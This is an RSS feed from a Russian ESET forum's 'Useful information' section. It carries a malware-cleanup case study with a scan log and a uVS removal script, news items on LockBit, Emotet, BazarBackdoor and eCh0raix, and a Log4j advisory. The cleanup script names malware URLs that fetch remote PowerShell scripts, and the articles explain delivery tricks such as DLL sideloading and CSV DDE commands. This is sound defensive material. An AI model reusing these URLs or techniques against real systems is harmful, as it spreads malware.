<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [форум: Полезная информация]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новые темы форума Полезная информация на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Sat, 04 Apr 2026 04:53:34 +0300</pubDate>
		<item>
			<title>Переход на новый форум PRO32</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic17991/message117367/">Переход на новый форум PRO32</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Дорогие участники форума! В ближайшее время форум будет переведен в режим работы &quot;только для чтения&quot;, публикация новых тем и сообщений будет ограничена. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму: <noindex><a href="https://forum.pro32.com/" target="_blank" rel="nofollow">https://forum.pro32.com/</a></noindex> Спасибо! <br />
			<i>26.01.2025 21:21:36, Валентин Поляков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic17991/message117367/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic17991/message117367/</guid>
			<pubDate>Sun, 26 Jan 2025 21:21:36 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Как Давид победил Голиафа</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic17114/message115359/">Как Давид победил Голиафа</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			К нам обратился Давид с вопросом, почему не все модули защиты включены после установки антивируса Pro32 Total Security. Так же он не смог активировать программу и обновить антивирусные базы.<br /><br /><img src="https://chklst.ru/uploads/editor/2p/a4e7esca4rp6.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />С его слов, он не смог установить Avast и Kaspersky, а техподдержка не смогла решить вопрос.<br />Давид предусмотрительно выполнил сканирование системы и предоставил диагностические логи.<br />Что же мы видим по логам:<br />
====code====
<pre>;================ Запуск результатов сканирования ==================
17-01-2023 12:18&nbsp;&nbsp;&nbsp;C:&#92;Program Files&#92;RDP Wrapper&#92;rdpwrap.dll&nbsp;&nbsp;&nbsp;is an Unwanted-Program ( 00555edb1 )&nbsp;&nbsp;&nbsp;Невозможно поместить в карантин
17-01-2023 13:16&nbsp;&nbsp;&nbsp;C:&#92;ProgramData&#92;RunDLL&#92;rundll.exe&nbsp;&nbsp;&nbsp;is a Trojan ( 005292541 )&nbsp;&nbsp;&nbsp;Невозможно поместить в карантин
17-01-2023 13:16&nbsp;&nbsp;&nbsp;C:&#92;ProgramData&#92;RunDLL&#92;system.exe&nbsp;&nbsp;&nbsp;is an Exploit ( 005560f51 )&nbsp;&nbsp;&nbsp;Невозможно поместить в карантин
17-01-2023 13:17&nbsp;&nbsp;&nbsp;C:&#92;ProgramData&#92;Windows Tasks Service&#92;winserv.exe&nbsp;&nbsp;&nbsp;is an Unwanted-Program ( 005442fc1 )&nbsp;&nbsp;&nbsp;Невозможно поместить в карантин
17-01-2023 13:17&nbsp;&nbsp;&nbsp;C:&#92;ProgramData&#92;WindowsTask&#92;MicrosoftHost.exe&nbsp;&nbsp;&nbsp;is an Adware ( 0055fa291 )&nbsp;&nbsp;&nbsp;Невозможно поместить в карантин
17-01-2023 13:42&nbsp;&nbsp;&nbsp;C:&#92;Windows&#92;KMS-R@1nHook.dll&nbsp;&nbsp;&nbsp;is an Unwanted-Program ( 004d38111 )&nbsp;&nbsp;&nbsp;Невозможно поместить в карантин
17-01-2023 15:01&nbsp;&nbsp;&nbsp;C:&#92;Windows&#92;SysWOW64&#92;mintcastnetworks.dll&nbsp;&nbsp;&nbsp;is a Trojan ( 0001140e1 )&nbsp;&nbsp;&nbsp;Невозможно поместить в карантин
17-01-2023 13:17&nbsp;&nbsp;&nbsp;C:&#92;ProgramData&#92;WindowsTask&#92;win.exe&nbsp;&nbsp;&nbsp;Файл зашифрован!&nbsp;&nbsp;&nbsp;Ожидается действие ( Не подлежит лечению )
17-01-2023 13:16&nbsp;&nbsp;&nbsp;C:&#92;ProgramData&#92;RunDLL&#92;2x64.dll&nbsp;&nbsp;&nbsp;is a Riskware ( 0040eff71 )&nbsp;&nbsp;&nbsp;Был удален
17-01-2023 13:16&nbsp;&nbsp;&nbsp;C:&#92;ProgramData&#92;RunDLL&#92;2x86.dll&nbsp;&nbsp;&nbsp;is a Trojan-Downloader ( 00536df71 )&nbsp;&nbsp;&nbsp;Был удален

;------------------- Отчет-------------------
;Найденные файлы: 245056
;Просканированные файлы: 243605
;Зараженные файлы: 65
;Таблица разделов просканирована: 0
;просканировано загрузочных секторов : 0
;Проблемы, которые необходимо исправить: 7
;================ Конец результатов сканирования ==================</pre>
=============
<br /><br /><img src="https://chklst.ru/uploads/editor/7k/556d55k8ae61.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Логи нас приятно удивили, не потому что система оказалась основательно поражена и заражена, а потому что в этой пораженной системе <B>антивирус PRO32 Total Security смог установиться и обойти все «защитные доспехи и барьеры» этого поистине вирусного Голиафа</B>: множественное активное заражение системы с процедурой восстановления через WMI, блокировку запуска установщиков антивирусных программ, блокировку путей установки антивирусных программ, блокировку доступа к сайтам и ресурсам антивирусных компаний и технических форумов. По словам Давида, после очистки системы вирусные файлы восстанавливались. И здесь без тонких инструментов окончательно победить Голиафа было крайне сложно.<br /><br />План был простой: очистить систему от Голиафа — Microsofthost.exe, далее восстановить работу модулей защиты антивирусной программы, активировать, обновить базы и выполнить контрольное полное сканирование системы.<br /><br />Используем uVS для очистки системы. (скрипты uVS индивидуальны для каждого случая).<br /><br />
====code====
<pre>;uVS v4.13 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv6.1
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

delref HTTP://PW.WEBPUBLIC.ORG/POWER3.TXT')||POWERSHELL.EXE
delref HTTP://PW3CLEAR.DLLCALISO.ORG/POWERC3.TXT')||POWERSHELL.EXE
delref HTTP://PWEAR.DLLCALISO.ORG/PW.TXT')||POWERSHELL.EXE
delwmi %Sys32%&#92;CMD.EXE
delall %SystemDrive%&#92;PROGRAMDATA&#92;WINDOWS TASKS SERVICE&#92;WINSERV.EXE
zoo %SystemDrive%&#92;PROGRAMDATA&#92;WINDOWSTASK&#92;AUDIODG.EXE
addsgn 1A6E769A552B1E3B8236EFE32D4360156C0186D675489FF2838B3A7AD8D139B3E4ACC1573E559D9B5E870E890EE98FEAAFAC0C7287AFB7A63B3F5BE9D7D4512D 8&nbsp;&nbsp;Win64/Packed.Themida.L 7

zoo %SystemDrive%&#92;PROGRAMDATA&#92;REALTEK&#92;TASKHOST.EXE
addsgn BA6F9BB2BDD5FF720B9C2D754C2124FBDA75303A02FF85B08FC3813792F5BB0DD4C78774FE1196886F09811A8E1C4939355C045ABD5D982C2D3F21EFB30C9B65 23 Win64/CoinMiner.ACX 7

zoo %SystemDrive%&#92;PROGRAMDATA&#92;REAITEKHD&#92;TASKHOST.EXE
zoo %SystemDrive%&#92;PROGRAMDATA&#92;REAITEKHD&#92;TASKHOSTW.EXE
zoo %SystemDrive%&#92;PROGRAMDATA&#92;REALTEK&#92;TASKHOSTW.EXE
zoo %SystemDrive%&#92;PROGRAMDATA&#92;RUNDLL&#92;RUNDLL.EXE
addsgn 1A97749A5583D38FF42B254E3143FE8E608277F608C27C0BE823B096D3AE614F563348172A68BD4CB899F08A7B374C6964ABE64F77DF23355970992F879F2306 8 Python/Agent.BL &#91;ESET-NOD32&#93; 7

zoo %SystemDrive%&#92;PROGRAMDATA&#92;WINDOWSTASK&#92;MICROSOFTHOST.EXE
addsgn BA6F9BB2BD5149720B9C2D754C2160FBDA75303A4536D3B4490F09709C1ABD80EFDBA531314A19492B80849F0E95A5EA3156FC561953EC08253A97F48B8B7657 21 Win64/CoinMiner.QG 7

zoo %SystemDrive%&#92;PROGRAMDATA&#92;RUNDLL&#92;SYSTEM.EXE
addsgn 1A7F749A5583368CF42BFB3A88A212FA30F69CB689056A707AD645DC10D61945271703A82B2DFD092BD07B8A327609FA201CBDF9B95B5C082E77A445D0EE667A 8 Win32/Exploit.Equation.M &#91;ESET-NOD32&#93; 7

zoo %SystemDrive%&#92;PROGRAMDATA&#92;RUNDLL&#92;START.EXE
addsgn 1A69149A5583348CF42B254E3143FE53A8CFF4A6020BF7FA793C3A7B5622B50E239C050963979949EC81705B0416A0CD802017F9AA8F3BC07BFC55E8C1F2E631 8 Python/Agent.BT 7

zoo %SystemDrive%&#92;PROGRAMDATA&#92;WINDOWSTASK&#92;APPMODULE.EXE
addsgn BA6F9BB2BD514E720B9C2D754C2160FBDA75303A6039BC78850F097063164849CB00BB5431C05D8AA8A511953E1549393556B4565D8FF8A18153E4D438F96AF2 8 Win64/CoinMiner.NZ 7

chklst
delvir

deldirex %SystemDrive%&#92;PROGRAMDATA&#92;RUNDLL


regt 14
deltmp
;
;
;
;-------------------------------------------------------------

restart
czoo</pre>
=============
<br /><br />После очистки системы от троянов и блокирующих элементов мы перешли к восстановлению работы антивирусной программы.<br />Выяснилось, что причиной незапуска служб может быть отсутствие прав системы для файлов каталога K7Computing<br /><br /><img src="https://chklst.ru/uploads/editor/sv/lmi1cmw2t3x4.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Добавили Систему с соответствующими разрешениями, все службы антивируса штатно запустились и все модули защиты включились. <br /><br /><img src="https://chklst.ru/uploads/editor/n8/i4eyqtkrybkm.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Добавили дополнительно права Системы на другие каталоги и заработало обновление антивирусных баз.<br /><br />После успешного обновления Давид смог выполнить полное сканирование системы, но к этому моменту остатки Голиафа были найдены только в карантинах. <img src="http://forum.esetnod32.ru/upload/main/smiles/5/icon_smile.gif" border="0" data-code=":)" data-definition="SD" alt=":)" style="width:16px;height:16px;" title="С улыбкой" class="bx-smile" />.<br /><br />(с), chklst.ru <br />
			<i>08.02.2023 07:52:36, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic17114/message115359/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic17114/message115359/</guid>
			<pubDate>Wed, 08 Feb 2023 07:52:36 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Операторы LockBit используют Windows Defender для загрузки Cobalt Strike</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16855/message114324/">Операторы LockBit используют Windows Defender для загрузки Cobalt Strike</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<span class="bx-font" style="font-size:14pt; line-height: normal;">Злоумышленники, связанные с LockBit 3.0, злоупотребляют инструментом командной строки Защитника Windows, чтобы загружать маяки Cobalt Strike на скомпрометированные системы и избегать обнаружения программным обеспечением безопасности.</span><br /><br /><br />====quote====<br />Cobalt Strike — это легитимный набор для тестирования на проникновение с обширными функциями, популярными среди злоумышленников, для скрытой разведки сети и горизонтального перемещения перед тем, как украсть данные и зашифровать их.<br />=============<br /><br />Однако решения по обеспечению безопасности стали лучше обнаруживать маяки Cobalt Strike, что заставляет злоумышленников искать инновационные способы развертывания инструментария.<br /><br /> &nbsp; &nbsp;В недавнем случае реакции на атаку LockBit исследователи из Sentinel Labs заметили злоупотребление инструментом командной строки Microsoft Defender «MpCmdRun.exe» для боковой загрузки вредоносных библиотек DLL, которые расшифровывают и устанавливают маяки Cobalt Strike.<br /><br />Первоначальная компрометация сети в обоих случаях была осуществлена &#8203;&#8203;путем использования уязвимости Log4j на уязвимых серверах VMWare Horizon для запуска кода PowerShell.<br /><br />Неопубликованная загрузка маяков Cobalt Strike на скомпрометированные системы не является чем-то новым для LockBit, поскольку есть сообщения о подобных цепочках заражения, основанных на злоупотреблении утилитами командной строки VMware.<br /><br />Злоупотребление Microsoft Defender<br /><br />После установления доступа к целевой системе и получения необходимых пользовательских привилегий злоумышленники используют PowerShell для загрузки трех файлов: чистой копии утилиты Windows CL, файла DLL и файла журнала.<br /><br /><br />====quote====<br /> &nbsp; &nbsp;MpCmdRun.exe — это утилита командной строки для выполнения задач Microsoft Defender, которая поддерживает команды для сканирования на наличие вредоносных программ, сбора информации, восстановления элементов, выполнения диагностической трассировки и многого другого.<br />=============<br /><br />При выполнении MpCmdRun.exe загрузит законную DLL с именем «mpclient.dll», которая необходима для правильной работы программы.<br /><br /> &nbsp; &nbsp;В случае, проанализированном SentinelLabs, злоумышленники создали собственную версию mpclient.dll, предназначенную для использования в качестве оружия, и поместили ее в место, которое отдает приоритет загрузке вредоносной версии DLL-файла.<br /><br />Исполняемый код загружает и расшифровывает зашифрованную полезную нагрузку Cobalt Strike из файла «c0000015.log», установленного вместе с двумя другими файлами на более ранней стадии атаки.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/exploit-chain.png" alt="Пользователь добавил изображение" border="0" /><br /><br />Хотя неясно, почему операторы LockBit переключились с VMware на инструменты командной строки Защитника Windows для боковой загрузки маяков Cobalt Strike, это может быть сделано для обхода целевых средств защиты, реализованных в ответ на предыдущий метод.<br /><br />Использование легитимных инструментов для уклонения от обнаружения EDR и AV в наши дни чрезвычайно распространено; следовательно, организациям необходимо проверять свои средства управления безопасностью и проявлять бдительность, отслеживая использование законных исполняемых файлов, которые могут быть использованы злоумышленниками.<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/lockbit-operator-abuses-windows-defender-to-load-cobalt-strike/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/lockbit-operator-abuses-windows-defender-to-load-cobalt-strike/</a></noindex> <br />
			<i>30.07.2022 11:12:17, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16855/message114324/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16855/message114324/</guid>
			<pubDate>Sat, 30 Jul 2022 11:12:17 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Вредоносная программа Emotet теперь устанавливается через PowerShell в ярлыках Windows</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16788/message114026/">Вредоносная программа Emotet теперь устанавливается через PowerShell в ярлыках Windows</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<span class="bx-font" style="font-size:13pt; line-height: normal;">Ботнет Emotet теперь использует файлы ярлыков Windows (.LNK), содержащие команды PowerShell, для заражения компьютеров жертв, отказываясь от макросов Microsoft Office, которые теперь отключены по умолчанию.</span><br /><br />Использование файлов .LNK не ново, так как Emotet ранее использовала их в сочетании с кодом Visual Basic Script (VBS) для создания команды, загружающей полезную нагрузку. Однако они впервые использовали ярлыки Windows для прямого выполнения команд PowerShell.<br /><br />Новая техника после неудачной кампании<br /><br />В прошлую пятницу операторы Emotet прекратили фишинговую кампанию, потому что они испортили свой установщик после того, как использовали статическое имя файла для ссылки на вредоносный ярлык .LNK.<br /><br />Запуск ярлыка запускал команду, которая извлекала строку кода VBS и добавляла ее в файл VBS для выполнения.<br /><br />Однако, поскольку у распределенных файлов ярлыков было другое имя, чем статическое, которое они искали, это не помогло бы правильно создать файл VBS. Группа устранила проблему вчера.<br /><br />Сегодня исследователи безопасности заметили, что Emotet перешел на новую технику, которая использует команды PowerShell, прикрепленные к LNK-файлу, для загрузки и выполнения скрипта на зараженном компьютере.<br /><br />Вредоносная строка, добавляемая к файлу .LNK, запутывается и дополняется нулями (пробелом), чтобы она не отображалась в целевом поле (файл, на который указывает ярлык) диалогового окна свойств файла.<br /><br />Вредоносный файл .LNK Emotet содержит URL-адреса нескольких скомпрометированных веб-сайтов, используемых для хранения полезной нагрузки сценария PowerShell. Если сценарий присутствует в одном из определенных мест, он загружается во временную папку системы как сценарий PowerShell со случайным именем.<br /><br />Ниже представлена деобфусцированная версия вредоносной строки Emotet, прикрепленной к полезной нагрузке .LNK:<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/Botnets/Emotet/EmotetLNK_PowerShell.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Этот сценарий создает и запускает другой сценарий PowerShell, который загружает вредоносное ПО Emotet из списка скомпрометированных сайтов и сохраняет его в папку %Temp%. Затем загруженная DLL запускается с помощью команды regsvr32.exe.<br /><br />Выполнение сценария PowerShell выполняется с помощью утилиты командной строки Regsvr32.exe и заканчивается загрузкой и запуском вредоносного ПО Emotet.<br /><br />Исследователь безопасности Макс Малютин говорит, что наряду с использованием PowerShell в файлах LNK этот поток выполнения является новым для развертывания вредоносного ПО Emotet.<br /><br />Новая техника на подъеме<br /><br />Исследовательская группа Cryptolaemus, которая внимательно следит за активностью Emotet, отмечает, что новая техника является явной попыткой злоумышленника обойти защиту и автоматическое обнаружение.<br /><br />Исследователи безопасности из компании ESET, занимающейся кибербезопасностью, также заметили, что использование новой технологии Emotet увеличилось за последние 24 часа.<br /><br />Данные телеметрии ESET показывают, что страны, наиболее затронутые Emotet с помощью новой технологии, — это Мексика, Италия, Япония, Турция и Канада.<br /><br />Помимо перехода на PowerShell в файлах .LNK, операторы ботнета Emotet внесли несколько других изменений с тех пор, как в ноябре возобновили свою деятельность на более стабильном уровне, например, перешли на 64-битные модули.<br /><br />Вредоносная программа обычно используется в качестве шлюза для других вредоносных программ, особенно угроз программ-вымогателей, таких как Conti.<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/</a></noindex> <br />
			<i>03.05.2022 11:39:44, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16788/message114026/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16788/message114026/</guid>
			<pubDate>Tue, 03 May 2022 11:39:44 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Текстовые файлы CSV, используются для установки вредоносного ПО BazarBackdoor</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16711/message113821/">Текстовые файлы CSV, используются для установки вредоносного ПО BazarBackdoor</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<B>Новая фишинговая кампания использует специально созданные текстовые файлы CSV для заражения устройств пользователей вредоносным ПО BazarBackdoor.</B><br /><br />Файл значений, разделенных запятыми (CSV), представляет собой текстовый файл, содержащий строки текста со столбцами данных, разделенными запятыми. Во многих случаях первая строка текста является заголовком или описанием для каждого столбца.<br /><br />Использование файлов CSV — это популярный метод экспорта данных из приложений, которые затем можно импортировать в другие программы в качестве источника данных, будь то Excel, база данных, менеджеры паролей или программное обеспечение для выставления счетов.<br /><br /> &nbsp; &nbsp;Поскольку CSV — это просто текст без исполняемого кода, многие люди считают эти типы файлов безвредными и могут быть более беззаботными при их открытии.<br /><br /> &nbsp; &nbsp;Однако Microsoft Excel поддерживает функцию динамического обмена данными (DDE), которую можно использовать для выполнения команд, выходные данные которых вводятся в открытую электронную таблицу, включая файлы CSV.<br /><br /><br />К сожалению, злоумышленники также могут злоупотреблять этой функцией для выполнения команд, загружающих и устанавливающих вредоносные программы на ничего не подозревающих жертвах.<br /><br />Файл CSV использует DDE для установки BazarBackdoor.<br /><br />Новая фишинговая кампания, обнаруженная исследователем безопасности Крисом Кэмпбеллом, устанавливает троян BazarLoader/BazarBackdoor через вредоносные CSV-файлы.<br /><br />BazarBackdoor — скрытая вредоносная программа-бэкдор, созданная группой TrickBot для предоставления злоумышленникам удаленного доступа к внутреннему устройству, которое можно использовать в качестве плацдарма для дальнейшего бокового перемещения в сети.<br /><br />Фишинговые электронные письма выдают себя за «рекомендации по переводу платежей» со ссылками на удаленные сайты, которые загружают CSV-файл с именами, похожими на «document-21966.csv».<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazaloader/csv-file/spam-email.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Как и все файлы CSV, файл document-21966.csv представляет собой просто текстовый файл со столбцами данных, разделенными запятыми<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazaloader/csv-file/malicious-csv-file.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Однако замечаем, что один из столбцов данных содержит странный вызов WMIC в одном из столбцов данных, который запускает команду PowerShell.<br /><br />Это =WmiC| Команда — это функция DDE, которая заставляет Microsoft Excel при наличии разрешения запускать WMIC.exe и выполнять предоставленную команду PowerShell для ввода данных в открытую книгу.<br /><br />В этом конкретном случае DDE будет использовать WMIC для создания нового процесса PowerShell, который открывает удаленный URL-адрес, содержащий другую команду PowerShell, которая затем выполняется.<br /><br />Команда удаленного сценария PowerShell, показанная ниже, загрузит файл picture.jpg и сохранит его как C:\Users\Public\87764675478.dll. Затем эта программа DLL запускается с помощью команды rundll32.exe.<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazaloader/csv-file/powershell-command.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Файл DLL установит BazarLoader, в конечном итоге развернув BazarBackdoor и другие полезные нагрузки на устройстве.<br /><br />К счастью, когда этот CSV-файл открывается в Excel, программа обнаружит вызов DDE и предложит пользователю «включить автоматическое обновление ссылок», что помечено как проблема безопасности.<br /><br />Даже если они активируют эту функцию, Excel покажет им другое приглашение, подтверждающее, следует ли разрешить WMIC начать доступ к удаленным данным.<br /><br />Если пользователь подтвердит оба запроса, Microsoft Excel запустит сценарии PowerShell, DLL будет загружена и выполнена, а BazarBackdoor будет установлен на устройстве.<br /><br />Хотя эта угроза требует от пользователей подтверждения того, что функция DDE должна быть разрешена для выполнения, генеральный директор AdvIntel Виталий Кремез сказал, что люди становятся жертвами продолжающейся фишинговой атаки.<br /><br />«Исходя из данных телеметрии BazarBackdoor, за последние два дня мы обнаружили 102 реальных корпоративных и государственных жертвы, не входящих в песочницу, в результате этой фишинговой кампании», — пояснил Кремез в онлайн-обсуждении.<br /><br />После установки BazarBackdoor злоумышленники получат доступ к корпоративной сети, которую атаки будут использовать для горизонтального распространения по всей сети.<br /><br />В конечном итоге это может привести к дальнейшему заражению вредоносным ПО, краже данных и внедрению программ-вымогателей.<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/</a></noindex> <br />
			<i>05.02.2022 13:14:15, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16711/message113821/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16711/message113821/</guid>
			<pubDate>Sat, 05 Feb 2022 13:14:15 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Устройства QNAP NAS подверглись атакам программ-вымогателей ech0raix</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16676/message113562/">Устройства QNAP NAS подверглись атакам программ-вымогателей ech0raix</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Пользователи сетевых хранилищ (NAS) QNAP сообщают об атаках на свои системы с помощью программы-вымогателя eCh0raix, также известной как <B>QNAPCrypt.</B><br /><br />Злоумышленник, стоящий за этим конкретным вредоносным ПО, активизировал свою деятельность примерно за неделю до Рождества, взяв под контроль устройства с правами администратора.<br />Подскакивает количество атак перед Рождеством<br /><br />Пользователи, управляющие системами QNAP и Synology NAS, регулярно сообщают об атаках программ-вымогателей eCh0raix, но около 20 декабря многие из них начали сообщать об инцидентах.<br /><br />Скачок количества атак подтверждается службой вымогателей ID, количество заявок на которую начало расти 19 декабря и снизилось к 26 декабря.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/2021/eCh0raixIDR.png" alt="Пользователь добавил изображение" border="0" /><br /><br />Первоначальный вектор заражения пока неясен. Некоторые пользователи признают, что они были безрассудными и не защитили устройство должным образом (например, открыли доступ к Интернету через небезопасное соединение); другие утверждают, что уязвимость в Photo Station QNAP позволила злоумышленникам нанести ущерб.<br /><br />Независимо от пути атаки, похоже, что злоумышленник eCh0raix создает пользователя в группе администраторов, что позволяет им шифровать все файлы в системе NAS.<br /><br />Пользователи QNAP - некоторые из них используют устройство NAS в деловых целях - сообщили на форуме BleepingComputer, что вредоносная программа зашифровала изображения и документы.<br /><br />Помимо всплеска числа атак, в этой кампании выделяется то, что злоумышленник неправильно ввел расширение для записки о выкупе и использовал расширение «.TXTT».<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/2021/eCh0raixNote.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Важно отметить, что существует бесплатный дешифратор для файлов, заблокированных с помощью более старой версии (до 17 июля 2019 г.) вымогателя eCh0raix. Однако бесплатного решения для расшифровки данных, заблокированных последними версиями вредоносного ПО (версии 1.0.5 и 1.0.6), не существует.<br /><br />Атаки с использованием eCh0raix / QNAPCrypt начались в июне 2019 года и с тех пор представляют собой постоянную угрозу. Ранее в этом году QNAP предупредил своих пользователей об очередном шквале атак eCh0raix в начале этого года, нацеленных на устройства со слабыми паролями.<br /><br />Пользователи должны следовать рекомендациям QNAP, чтобы обеспечить надлежащую защиту своих устройств NAS и данных, которые они хранят.<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/qnap-nas-devices-hit-in-surge-of-ech0raix-ransomware-attacks/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/qnap-nas-devices-hit-in-surge-of-ech0raix-ransomware-attacks/</a></noindex> <br />
			<i>28.12.2021 08:16:55, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16676/message113562/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16676/message113562/</guid>
			<pubDate>Tue, 28 Dec 2021 08:16:55 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Информация об уязвимости Log4j 2</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16665/message113510/">Информация об уязвимости Log4j 2</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<span class="bx-font" style="font-size:14pt; line-height: normal;">Сведения об оповещении</span><br /><br />10 декабря ESET начала исследование уязвимости в служебной программе Log4j 2 (CVE-2021-44228). Эта уязвимость может позволить злоумышленнику удаленно выполнить код.<br /><br />Подробнее об уязвимости читайте в нашей <noindex><a href="https://www.welivesecurity.com/2021/12/13/log4shell-vulnerability-what-we-know-so-far/" target="_blank" rel="nofollow">статье WeLiveSecurity.</a></noindex><br /><br />Команды инженеров ESET круглосуточно работают над выявлением, исправлением и защитой любых потенциально уязвимых систем. В настоящее время нам не известно о кражах данных.<br /><br />Шаги по смягчению:<noindex><a href="https://www.welivesecurity.com/2021/12/13/log4shell-vulnerability-what-we-know-so-far/#Mitigationsteps" target="_blank" rel="nofollow">следуйте инструкциям в статье WeLiveSecurity Уязвимость Log4Shell</a></noindex>: что нам известно на данный момент.<br /><br />Пользователи ESET Secure Authentication (ESA): пока не будет выпущено исправление для автоматического решения проблемы, обновляйте экземпляр Elasticsearch вручную. <br /><br />Пользователи ESET Enterprise Inspector (EEI): пользователи <noindex><a href="https://support.eset.com/en/kb8192-add-detection-rules-in-eset-enterprise-inspector-for-log4j-2-vulnerability" target="_blank" rel="nofollow">могут добавлять правила обнаружения в EEI</a></noindex> для обнаружения Log4j. <br /><br />Список продуктов ESET, которые могут защитить вашу систему или сеть<br /><br />С 11 декабря функция защиты от сетевых атак в продуктах безопасности ESET для Windows была обновлена для обнаружения эксплойтов уязвимости. ESET блокирует попытки атак с 14:24 по центральноевропейскому времени того же дня.<br /><br />Следующие продукты ESET способны обнаруживать и блокировать потенциальную атаку на вашу систему или сеть. Если вы используете более раннюю версию продукта безопасности ESET, мы рекомендуем обновить продукт ESET до последней версии.<br /><br /> &nbsp; <br />====quote====<br /> &nbsp;Продукты для бизнеса: ESET Endpoint Antivirus, ESET Endpoint Security и все продукты ESET Server Security <B><B>версии 7.0 и новее.</B></B><br /> &nbsp; &nbsp; Потребительские продукты: ESET Internet Security, ESET Smart Security и ESET Smart Security Premium <B>версии 6.0 и более поздних.</B> <br />=============<br /><br /><img src="https://support.eset.com/storage/IMAGES/en/KB8818/KB8818Fig0.png" alt="Пользователь добавил изображение" border="0" /><br /><br />Список продуктов ESET, подтвержденных как защищенные от уязвимости Log4j 2<br /><br />По состоянию на 15 декабря продукты ESET, перечисленные ниже, были проверены и подтверждены, что они не подвержены уязвимости Log4j 2. Это означает, что следующие продукты нельзя использовать для удаленного выполнения кода.<br /><br /> &nbsp; &nbsp; Локальные продукты: <br /><br />ESET PROTECT<br />ESET Security Management Center<br />ESET Remote Administrator<br />ESET Enterprise Inspector<br />ESET NOD32 Antivirus/Internet Security/Smart Security Premium for Windows<br />ESET Endpoint Antivirus/Endpoint Security for Windows<br />ESET Server Security for Microsoft Windows Server (former ESET File Security for Microsoft Windows Server)<br />ESET Security for Microsoft SharePoint Server<br />ESET Mail Security for Exchange<br />ESET Mail Security for IBM Domino (former ESET Mail Security for IBM Lotus Domino)<br />ESET Mobile Security for Android<br />ESET Parental Control for Android<br />ESET HOME - Mobile Apps<br />ESET Server Security for Linux (former ESET File Security for Linux)<br />ESET Security for Kerio<br />ESET Endpoint Antivirus for Linux<br />ESET Virtualization Security for VMware NSX<br />ESET Mail/File/Gateway Security for Linux/BSD v4.5<br />ESET NOD32 Antivirus for Linux v4 (Home and Business Edition)<br 